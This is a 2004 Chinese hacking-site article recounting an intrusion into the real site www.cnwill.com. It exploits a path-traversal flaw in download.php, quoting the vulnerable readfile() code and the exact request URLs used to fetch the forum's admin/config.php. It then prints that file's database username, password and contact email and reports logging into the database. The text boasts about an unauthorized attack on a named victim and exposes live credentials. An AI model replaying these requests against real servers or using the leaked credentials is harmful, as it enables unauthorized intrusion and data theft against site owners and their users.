首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
入侵www.cnwill.com
来源:vfocus.net 作者:≯Super·Hei 发布时间:2004-04-01  

入侵www.cnwill.com


by ≯Super·Hei (sex.cnse8.com) 2004-3-31
问题出在下载系统的download.php
我们访问:http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt

呵呵 !! 看到./你会想到什么 :)

http://www.cnwill.com/soft/download.php?fname=./www.ChinaSafe.org.txt

返回:
<br />
<b>Warning</b>: readfile(): Unable to access ../www.ChinaSafe.org.txt in <b>/usr/home/cnwill/soft/download.php</b> on line <b>35</b><br />
<br />
<b>Warning</b>: readfile(../www.ChinaSafe.org.txt): failed to open stream: Invalid argument in <b>/usr/home/cnwill/soft/download.php</b> on line <b>35</b><br />

看来使用的是readfile(),去下个原文件看看先。download.php代码:

$extensie = strrchr($_GET['fname'], ".");

if (!in_array(substr($extensie, 1), $not_to_be_dloaded)) {
// the source file is output
readfile($_GET['fname']);
} else {
// message when downloading a forbidden file
echo "$msg_not_allowed";
}

?>

对fname没有过滤.和/ 看来我们可以readfile所有的文件拉 哈哈~~~

目标得到论坛config.php,呵呵~~ 其他的好象都是文本数据的 。
看看论坛 Powered by: vBulletin Version 2.2.8
提交http://www.cnwill.com/forum/readme.txt 返回readme.txt的内容,看来存在readme.txt

我们回到download.php,提交:
http://www.cnwill.com/soft/download.php?fname=./../forum/readme.txt 哈哈!!
成功返回 胜利就在眼前拉。

提交http://www.cnwill.com/soft/download.php?fname=./../forum/admin/config.php

哈哈 出现个下载提示,用网快下载后打开:

<?php

/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////

// type of database running
// (only mysql is supported at the moment)
$dbservertype='mysql';

// hostname or ip of server
$servername='localhost';

// username and password to log onto db server
$dbusername='cnwill';
$dbpassword='54safer';

// name of database
$dbname='cnwill';

// technical email address - any error messages will be emailed here
$technicalemail='54safer@163.com';

// use persistant connections to the database
// 0 = don't use
// 1 = use
$usepconnect=0;

?>

呵呵 用sql连接成功,hoho 以下的事是体力活。。呵呵 不想干了。。。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·PHP配置漏洞攻击
·Discuz!跨站大全
·跨越FSO,WSH写文件
·Hook 系统服务隐藏端口
·绕过Windows Rootkit检测系统
·用expect写的bbs猜密码工具
·建造永不被杀的80端口后门
·挂钩Windows API
·如何把ASP编写成DLL
·在NT系列操作系统里让自己“消失
·入侵日记一则(CPB论坛注入攻击)
·SQL注入的不常见方法
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved